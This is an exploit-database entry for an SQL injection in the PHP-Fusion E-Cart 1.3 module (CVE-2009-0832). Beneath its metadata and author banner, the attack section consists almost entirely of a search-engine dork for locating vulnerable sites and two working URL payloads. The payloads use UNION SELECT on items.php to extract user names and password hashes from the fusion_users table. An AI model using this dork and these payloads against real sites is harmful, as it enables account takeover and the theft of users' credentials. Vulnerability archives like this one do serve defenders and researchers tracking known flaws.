PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2009-01-06
date_updated: 2016-11-22
verified: 1
codes: OSVDB-51998;CVE-2009-0832
tags:
aliases:
screenshot_url:
application_url:
#####################################################################################
#### PHP-Fusion Mod E-Cart Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281
# #
#Dork : inurl:/infusions/e_cart #
# #
#####################################################################################
# [Bug] #
# #
#Username : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
# #
#Password : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# milw0rm.com [2009-01-07]